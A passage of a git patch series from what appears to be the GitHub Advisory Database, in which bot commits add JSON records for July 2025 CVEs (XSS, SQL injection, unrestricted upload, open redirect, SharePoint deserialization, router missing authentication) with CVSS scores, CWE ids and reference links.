"https://vuldb.com/?id.316945" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616367" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T21:15:24Z" + } +} \ No newline at end of file From b7295d3d2899197e3fd12e3fe77b3757ea5db3f3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 00:31:35 +0000 Subject: [PATCH 031/323] Publish Advisories GHSA-2j6c-7xmj-j4pm GHSA-fcww-2hqv-5f4x GHSA-hp8c-r7qc-qrh2 --- .../GHSA-2j6c-7xmj-j4pm.json | 56 +++++++++++++++++++ .../GHSA-fcww-2hqv-5f4x.json | 56 +++++++++++++++++++ .../GHSA-hp8c-r7qc-qrh2.json | 56 +++++++++++++++++++ 3 files changed, 168 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-2j6c-7xmj-j4pm/GHSA-2j6c-7xmj-j4pm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fcww-2hqv-5f4x/GHSA-fcww-2hqv-5f4x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hp8c-r7qc-qrh2/GHSA-hp8c-r7qc-qrh2.json diff --git a/advisories/unreviewed/2025/07/GHSA-2j6c-7xmj-j4pm/GHSA-2j6c-7xmj-j4pm.json b/advisories/unreviewed/2025/07/GHSA-2j6c-7xmj-j4pm/GHSA-2j6c-7xmj-j4pm.json new file mode 100644 index 0000000000000..14f64e3c175a6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2j6c-7xmj-j4pm/GHSA-2j6c-7xmj-j4pm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j6c-7xmj-j4pm", + "modified": "2025-07-20T00:30:19Z", + "published": "2025-07-20T00:30:19Z", + "aliases": [ + "CVE-2025-7858" + ], + "details": "A vulnerability classified as problematic has been found in PHPGurukul Apartment Visitors Management System 1.0. This affects an unknown part of the file /admin-profile.php of the component HTTP POST Request Handler. The manipulation of the argument adminname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7858" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/10" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316971" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316971" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616879" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T00:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fcww-2hqv-5f4x/GHSA-fcww-2hqv-5f4x.json b/advisories/unreviewed/2025/07/GHSA-fcww-2hqv-5f4x/GHSA-fcww-2hqv-5f4x.json new file mode 100644 index 0000000000000..3b313e06679c2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fcww-2hqv-5f4x/GHSA-fcww-2hqv-5f4x.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcww-2hqv-5f4x", + "modified": "2025-07-20T00:30:19Z", + "published": "2025-07-20T00:30:19Z", + "aliases": [ + "CVE-2025-7856" + ], + "details": "A vulnerability was found in PHPGurukul Apartment Visitors Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file pass-details.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7856" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/8" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316969" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316969" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616843" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T22:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hp8c-r7qc-qrh2/GHSA-hp8c-r7qc-qrh2.json b/advisories/unreviewed/2025/07/GHSA-hp8c-r7qc-qrh2/GHSA-hp8c-r7qc-qrh2.json new file mode 100644 index 0000000000000..309a2c01d0339 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hp8c-r7qc-qrh2/GHSA-hp8c-r7qc-qrh2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hp8c-r7qc-qrh2", + "modified": "2025-07-20T00:30:19Z", + "published": "2025-07-20T00:30:19Z", + "aliases": [ + "CVE-2025-7857" + ], + "details": "A vulnerability was found in PHPGurukul Apartment Visitors Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file bwdates-passreports-details.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7857" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/9" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316970" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316970" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616867" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T23:15:22Z" + } +} \ No newline at end of file From e0372e5bf951cdf6df3ed13a5170606478e16b7e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 03:32:29 +0000 Subject: [PATCH 032/323] Publish Advisories GHSA-4xh2-6c5f-qwx3 GHSA-fhx3-5625-8mwv GHSA-h6x5-j26w-27q4 GHSA-mqcp-p2hv-vw6x GHSA-phqm-82j2-rc5x GHSA-vm25-8x3c-9vc3 GHSA-xcrc-8vqv-vc8r GHSA-xr8w-5325-33v3 --- .../GHSA-4xh2-6c5f-qwx3.json | 60 +++++++++++++++++ .../GHSA-fhx3-5625-8mwv.json | 56 ++++++++++++++++ .../GHSA-h6x5-j26w-27q4.json | 56 ++++++++++++++++ .../GHSA-mqcp-p2hv-vw6x.json | 48 ++++++++++++++ .../GHSA-phqm-82j2-rc5x.json | 60 +++++++++++++++++ .../GHSA-vm25-8x3c-9vc3.json | 64 +++++++++++++++++++ .../GHSA-xcrc-8vqv-vc8r.json | 36 +++++++++++ .../GHSA-xr8w-5325-33v3.json | 56 ++++++++++++++++ 8 files changed, 436 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-4xh2-6c5f-qwx3/GHSA-4xh2-6c5f-qwx3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fhx3-5625-8mwv/GHSA-fhx3-5625-8mwv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h6x5-j26w-27q4/GHSA-h6x5-j26w-27q4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mqcp-p2hv-vw6x/GHSA-mqcp-p2hv-vw6x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-phqm-82j2-rc5x/GHSA-phqm-82j2-rc5x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vm25-8x3c-9vc3/GHSA-vm25-8x3c-9vc3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xr8w-5325-33v3/GHSA-xr8w-5325-33v3.json diff --git a/advisories/unreviewed/2025/07/GHSA-4xh2-6c5f-qwx3/GHSA-4xh2-6c5f-qwx3.json b/advisories/unreviewed/2025/07/GHSA-4xh2-6c5f-qwx3/GHSA-4xh2-6c5f-qwx3.json new file mode 100644 index 0000000000000..a2d7612e9baea --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4xh2-6c5f-qwx3/GHSA-4xh2-6c5f-qwx3.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xh2-6c5f-qwx3", + "modified": "2025-07-20T03:30:20Z", + "published": "2025-07-20T03:30:20Z", + "aliases": [ + "CVE-2025-7864" + ], + "details": "A vulnerability was found in thinkgem JeeSite up to 5.12.0. It has been classified as critical. This affects the function Upload of the file src/main/java/com/jeesite/modules/file/web/FileUploadController.java. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 3585737d21fe490ff6948d913fcbd8d99c41fc08. It is recommended to apply a patch to fix this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7864" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/31" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/31#issuecomment-3051363397" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/commit/3585737d21fe490ff6948d913fcbd8d99c41fc08" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316977" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316977" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618189" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T03:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fhx3-5625-8mwv/GHSA-fhx3-5625-8mwv.json b/advisories/unreviewed/2025/07/GHSA-fhx3-5625-8mwv/GHSA-fhx3-5625-8mwv.json new file mode 100644 index 0000000000000..4e376620901dc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fhx3-5625-8mwv/GHSA-fhx3-5625-8mwv.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhx3-5625-8mwv", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-7860" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Church Donation System 1.0. This issue affects some unknown processing of the file /members/login_admin.php. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7860" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/11" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316973" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316973" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616923" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T01:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h6x5-j26w-27q4/GHSA-h6x5-j26w-27q4.json b/advisories/unreviewed/2025/07/GHSA-h6x5-j26w-27q4/GHSA-h6x5-j26w-27q4.json new file mode 100644 index 0000000000000..ac3f2aad7e5a8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h6x5-j26w-27q4/GHSA-h6x5-j26w-27q4.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6x5-j26w-27q4", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-7859" + ], + "details": "A vulnerability classified as critical was found in code-projects Church Donation System 1.0. This vulnerability affects unknown code of the file /members/update_password_admin.php. The manipulation of the argument new_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7859" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/10" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316972" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316972" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616921" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T01:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mqcp-p2hv-vw6x/GHSA-mqcp-p2hv-vw6x.json b/advisories/unreviewed/2025/07/GHSA-mqcp-p2hv-vw6x/GHSA-mqcp-p2hv-vw6x.json new file mode 100644 index 0000000000000..f0dcbfdea63ed --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mqcp-p2hv-vw6x/GHSA-mqcp-p2hv-vw6x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqcp-p2hv-vw6x", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-54314" + ], + "details": "Thor before 1.4.0 can construct an unsafe shell command from library input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54314" + }, + { + "type": "WEB", + "url": "https://github.com/rails/thor/pull/897" + }, + { + "type": "WEB", + "url": "https://github.com/rails/thor/commit/536b79036a0efb765c1899233412e7b1ca94abfa" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3260153" + }, + { + "type": "WEB", + "url": "https://github.com/rails/thor/releases/tag/v1.4.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T03:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-phqm-82j2-rc5x/GHSA-phqm-82j2-rc5x.json b/advisories/unreviewed/2025/07/GHSA-phqm-82j2-rc5x/GHSA-phqm-82j2-rc5x.json new file mode 100644 index 0000000000000..e807a9a45075b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-phqm-82j2-rc5x/GHSA-phqm-82j2-rc5x.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqm-82j2-rc5x", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-7863" + ], + "details": "A vulnerability was found in thinkgem JeeSite up to 5.12.0 and classified as problematic. Affected by this issue is the function redirectUrl of the file src/main/java/com/jeesite/common/web/http/ServletUtils.java. The manipulation of the argument url leads to open redirect. The attack may be launched remotely. The name of the patch is 3d06b8d009d0267f0255acc87ea19d29d07cedc3. It is recommended to apply a patch to fix this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7863" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/30" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/30#issuecomment-3045861920" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/commit/3d06b8d009d0267f0255acc87ea19d29d07cedc3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316976" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316976" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618188" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T03:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vm25-8x3c-9vc3/GHSA-vm25-8x3c-9vc3.json b/advisories/unreviewed/2025/07/GHSA-vm25-8x3c-9vc3/GHSA-vm25-8x3c-9vc3.json new file mode 100644 index 0000000000000..8639c7cdfb23b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vm25-8x3c-9vc3/GHSA-vm25-8x3c-9vc3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm25-8x3c-9vc3", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-7862" + ], + "details": "A vulnerability has been found in TOTOLINK T6 4.1.5cu.748_B20211015 and classified as critical. Affected by this vulnerability is the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component Telnet Service. The manipulation of the argument telnet_enabled with the input 1 leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7862" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/5.md" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/5.md#poc-http" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316975" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316975" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.617643" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=XeKu3tfeSME" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T03:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json b/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json new file mode 100644 index 0000000000000..5d95aaa4483f0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcrc-8vqv-vc8r", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-53770" + ], + "details": "Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.\nMicrosoft is aware that an exploit for CVE-2025-53770 exists in the wild.\nMicrosoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53770" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T01:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xr8w-5325-33v3/GHSA-xr8w-5325-33v3.json b/advisories/unreviewed/2025/07/GHSA-xr8w-5325-33v3/GHSA-xr8w-5325-33v3.json new file mode 100644 index 0000000000000..cdef755550b42 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xr8w-5325-33v3/GHSA-xr8w-5325-33v3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr8w-5325-33v3", + "modified": "2025-07-20T03:30:19Z", + "published": "2025-07-20T03:30:19Z", + "aliases": [ + "CVE-2025-7861" + ], + "details": "A vulnerability, which was classified as critical, was found in code-projects Church Donation System 1.0. Affected is an unknown function of the file /members/search.php. The manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7861" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/12" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316974" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316974" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616925" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T01:15:31Z" + } +} \ No newline at end of file From 940e589dc7bec6bfed672404fe8210bc029859e4 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 06:32:52 +0000 Subject: [PATCH 033/323] Publish Advisories GHSA-9gfp-r89p-2326 GHSA-9vwg-x83c-449p GHSA-cv3p-whpp-jcwr GHSA-g822-656r-fggc GHSA-mmc6-r5xm-56vx GHSA-vc79-r43j-mc27 GHSA-vhxp-qr7j-q4qj --- .../GHSA-9gfp-r89p-2326.json | 52 ++++++++++++++++ .../GHSA-9vwg-x83c-449p.json | 52 ++++++++++++++++ .../GHSA-cv3p-whpp-jcwr.json | 52 ++++++++++++++++ .../GHSA-g822-656r-fggc.json | 60 +++++++++++++++++++ .../GHSA-mmc6-r5xm-56vx.json | 52 ++++++++++++++++ .../GHSA-vc79-r43j-mc27.json | 52 ++++++++++++++++ .../GHSA-vhxp-qr7j-q4qj.json | 52 ++++++++++++++++ 7 files changed, 372 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-9gfp-r89p-2326/GHSA-9gfp-r89p-2326.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9vwg-x83c-449p/GHSA-9vwg-x83c-449p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cv3p-whpp-jcwr/GHSA-cv3p-whpp-jcwr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g822-656r-fggc/GHSA-g822-656r-fggc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mmc6-r5xm-56vx/GHSA-mmc6-r5xm-56vx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vc79-r43j-mc27/GHSA-vc79-r43j-mc27.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vhxp-qr7j-q4qj/GHSA-vhxp-qr7j-q4qj.json diff --git a/advisories/unreviewed/2025/07/GHSA-9gfp-r89p-2326/GHSA-9gfp-r89p-2326.json b/advisories/unreviewed/2025/07/GHSA-9gfp-r89p-2326/GHSA-9gfp-r89p-2326.json new file mode 100644 index 0000000000000..a268c770a6140 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9gfp-r89p-2326/GHSA-9gfp-r89p-2326.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gfp-r89p-2326", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7869" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Portabilis i-Educar 2.9.0. Affected by this issue is some unknown functionality of the file intranet/educar_turma_tipo_det.php?cod_turma_tipo=ID of the component Turma Module. The manipulation of the argument nm_tipo leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": 